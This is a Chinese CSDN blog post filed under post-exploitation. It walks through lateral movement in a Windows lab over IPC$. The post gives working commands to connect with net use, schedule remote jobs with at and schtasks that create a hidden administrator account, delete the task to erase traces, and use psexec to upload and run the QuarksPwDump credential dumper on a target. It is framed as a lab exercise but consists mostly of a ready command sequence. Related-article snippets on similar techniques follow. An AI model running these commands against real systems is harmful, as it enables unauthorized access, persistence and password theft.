内网拓展——远程连接和执行程序

最新推荐文章于 2023-12-22 13:15:00 发布
最新推荐文章于 2023-12-22 13:15:00 发布
阅读量1k 收藏 6
点赞数
分类专栏: 后渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cxrpty/article/details/105119067
版权

远程连接方式有两种:

 1.利用账号和密码连接

2.利用hash注入连接

实验环境:目标机win8

                  边缘机win7

实验步骤:

一、进行远程连接

1.查看本地共享,利用ipc$共享进行远程连接

  

2.输入以下命令进行远程连接

net use \\目标ip  /user:用户名 密码

  

3.查看连接情况,显示连接成功

二、执行程序

方法一:利用at计划任务执行程序命令

1.首先查看目标机的时间是否和本机时间一致

net time \\目标ip

  

2.利用at命令添加计划任务

at \\目标ip 任务执行时间 命令
at \\192.168.240.139 13:25 net user cc 123.com /add

 

3.到设定时间返回目标机查看发现创建成功

  

4.利用at将该用户添加到管理员组

at \\192.168.240.139 13:30 net localgroup administrators cc /add

  

5.到设定时间返回查看

  

6.也可利用bat文件执行,首先在c盘创建一个bat文件(bat内容如下)

  

7.将该文件复制到目标机上,可通过共享文件复制,也可通过命令行复制,并查看里边内容

复制内容到目标机:copy 1.bat \\192.168.240.139\c$\1.bat
查看内容:type \\192.168.240.139\c$\1.bat

  

8.然后利用at添加计划任务

   at \\192.168.240.139 13:46 192.168.240.139\c$\1.bat
 或at \\192.168.240.139 13:46 c:\1.bat

  

9.到设定时间返回查看,可见命令执行成功

  

方法二:利用schtasks计划命令执行

schtasks /create /tn aa /tr c:\1.bat /sc once /st 14:01:20 /S 目标ip /U username /P password  /RU System

/tn  任务名字
/tr  文件
/sc  次数
/st  时间
/s   目标ip
/u   用户名
/p   密码
/RU  系统身份

  

  

如果想要任务立即执行,可输入:

schtasks /run /tn aa /s 目标ip /u 用户名 /p 密码

任务执行完,记得删除痕迹:

schtasks /F /delete /tn aa /s 目标ip /u 用户名 /p 密码

  

方法三:利用psexec远程执行命令

1.输入:

psexec.exe \\ip –accepteula -u username -p password program.exe

  

此时看到的就是目标服务器的cmd.exe

  

2.如果想上传如见到目标机,可依次输入:

net use \\目标机ip\c$ /user:administrator 密码
copy  QuarksPwDump.exe \\目标机ip\c$\

  

  在目标机可看见上传成功

3.利用psexec自带的参数上传程序到目标机,执行完后自动删除

Psexec.exe \\目标机ip -u 用户 -p 密码 -c QuarksPwDump.exe -d

  

  

没有如果ru果
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网远程工具
11-02
内网远程连接是一种技术,允许用户在局域网(LAN)内部或通过互联网访问和控制另一台计算机。这种技术在IT行业中广泛应用于系统管理、技术支持和远程协作,它使得即便设备不在同一地理位置,也能实现如同本地操作...
内网用户,远程连接共享软件
02-09
支持不同网络ip段的相互连接 ,能够获取临时的公网IP。
vs+iis 局域网内远程调试本地程序(接口调试)
伪装丶天堂的博客
12-10 1281
第一步:网站发布 本地电脑上安装iis后,需要吧网站发布到iis,且iis上可以正常访问   第二步 附加到进程 vs打断点,vs调试选择附加到进程,选择iis并附加 第二步 浏览器中访问即可调试 ...
NET USE命令打开一个远程服务器访问.
zhang6622056的专栏
03-23 4914
在编写服务器的时候我们有的时候会用Java去远程访问一个文件,比如音频,视频 可是当我们要输入账号密码的时候怎么去利用服务器去访问.这里就要用到net use 编码: String netuse = "net use \\\\172.16.11.101\\cic \"username\" /user:\"password\"; Process process1 = Runtime.getRunt
net use 访问远程主机
lao_pei的专栏
10-29 4282
1)net use h: \\ip地址\d$ 密码/user:用户名 直接登陆后映射对方d:到本地为H: 比如远程主机的用户名为 Administator , 密码为 password , ip 为 192.168.1.100 则在本地的命令为: net use h: \\192.168.1.100\d$ password /user:Ad...
网络安全学习-用户与组管理、远程连接、密码
最新发布
Runnymmede的博客
12-22 474
漏洞 1:未登陆系统前连按 5 次 shift 弹出程序 c:\windows\system32\sethc.exe。漏洞 2:部分 win7 及 win10 系统在未进入系统时,可以通过系统修复漏洞篡改。​ 账号密码存放位置:C\windows\system32\config\SAM。​ windows的系统管理员administrator的uid是500。windows服务器系统:win2000/2003/2008/2012。administrators #管理员组。
网络安全测试中内网横向拓展的途径
maoguan121的博客
09-29 1479
大多数内网存在VLAN跨网段隔离不严、共享服务器管理或访问权 限分配混乱、内部数据或应用系统开放服务或端口较多、内网防火墙 或网关设备固件版本陈旧、终端设备系统补丁更新不及时等问题,导 致内部网络防守比较薄弱,所以蓝队在内网横向拓展中采取的手段会 更加丰富多样。同时,因为内网具有通联性优势,所以内网横向拓展 工作主要围绕通联安全认证的获取与运用开展,主要途径有以下几 种。内网漏洞利用是内网横向拓展最主要的途径。
Frp内网穿透——frps服务端部署
01-20
本次带大家了解一下frp内网穿透的服务端教学,让你也能够部署一个内网穿透服务。 frp简介 通俗的说,frp是一个反向代理软件,它不仅轻量且功能很强大,可以使处于内网或防火墙后的设备对外界提供服务,它支持HTTP、...
远程桌面管理程序--好用的内网远程操控工具
09-11
在IT领域,远程桌面管理程序是一种非常实用的工具,它允许用户通过网络连接到其他设备,从而实现远程操控。尤其在内网环境中,这种...正确选择和设置远程桌面管理程序,可以让企业或个人的内网管理变得更加轻松和高效。
easyconnect-远程连接工具
02-23
在信息化高度发达的今天,远程连接工具已经成为许多企业和个人不可或缺的辅助工具。"EasyConnect"就是这样一款专为远程连接设计的高效软件,它允许用户轻松访问内网资源,实现远程办公、技术支持等功能。本文将深入...
蓝队攻击的四个阶段(四)
weixin_67503304的博客
01-14 1492
外网纵向突破 何为外网纵向突破 如果将目标网络比作一座城池,那么蓝队就是攻城者,而外网纵 向突破就好比在城墙上打开突破口进入城内。
图解net use 命令使用示例
bcbobo21cn的专栏
05-19 4万+
一 使用示例 检索网络连接列表 帮助 创建网络映像 建立空连接: 建立非空连接 本机的共享; 建立非空连接 删除共享映射 看下图,删除后客户端连接为0; 查看远程主机的共享资源 查看本地主机的共享资源 得到远程主机的用户名列表 得到本地
远程控制---实验九:IPC远程植入木马
weixin_70557959的博客
05-06 3758
目录 一、实验目的及要求 二、实验原理 IPC 空会话 IPC建立的过程 木马 三、实验环境 四、实验步骤及内容 五、实验总结 六、分析与思考 一、实验目的及要求 1、掌握利用 IPC$入侵目标计算机(windows XP 或 windows 2003)的方法; 2、制作并植入远控木马来达到远程控制对方计算机; 二、实验原理 IPC IPC(Inter-Process Communication) 进程间通信,是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道
与另一台计算机建立ipc,利用IPC$开启他人电脑远程桌面
weixin_29079643的博客
07-25 925
《利用IPC$开启他人电脑远程桌面》由会员分享,可在线阅读,更多相关《利用IPC$开启他人电脑远程桌面(2页珍藏版)》请在人人文库网上搜索。1、利用IPC$开启他人电脑远程桌面1.现在已经扫描到了一远程主机的管理员帐户administrator,密码为“123456”,可使用NET命令来建立IPC空连接,“net use 172.20.89.10IPC$ 123456 /user:administ...
使用net user命令远程访问主机文件
Mo小泽的技术博客
02-27 1万+
前几天去现场,发现实施的同学在操作图形工作站上的文件特别麻烦,大屏分辨率比较大的话,还得开个放大镜去看,有的还要跑到机房去插U盘的,总之特别费劲!其实,这些都可以在自己工作机上远程使用net user命令解决文件操作问题。PS:首先的保证你的工作机能PING通图形工作站如下有两种命令方式:net use \\ip地址\ipc$ "密码" /user:"用户名" 建立IPC非空链接 net use...
使用net use命令重新启动远程计算机
highwell的专栏
03-22 2429
注:远程服务器的C$被取消的,无效。 重新启动指定IP的远程计算机:DOS下: shutdown /r /m \\192.168.22.131 /t 0 /f //换成你的IP,-f表示强制重启)(需要sever服务开启) 如出现拒绝访问<5>的提示,表示你没有权限,这时输入下面命令: net use m: \\192.168.33.121\c$ //将C$映射为M驱动器(需要se...
net use 命令
weixin_34107955的博客
12-19 577
1)建立空连接:net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)2)建立非空连接:net use \\IP\ipc$ "密码" /user:"用户名" (同样有3个空格)3)映射默认共享:net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)如果已经和目标建...
net use 访问远程电脑
热门推荐
宁静以致远
06-27 4万+
net use \\ip\ipc$ " " /user:" " 建立IPC空链接 net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接 net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: net use h: \\ip\c$ 登陆后映射对方C:到本地为H: net use \\ip\ipc$ /de
内网穿透vscode远程连接
07-27
以下是一些步骤来实现内网穿透和 VSCode 的远程连接: 1. 选择一个内网穿透工具:有很多内网穿透工具可供选择,如 ngrok、frp、花生壳等。选择一个适合你的工具,并根据其官方文档进行安装和配置。 2. 配置内网...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值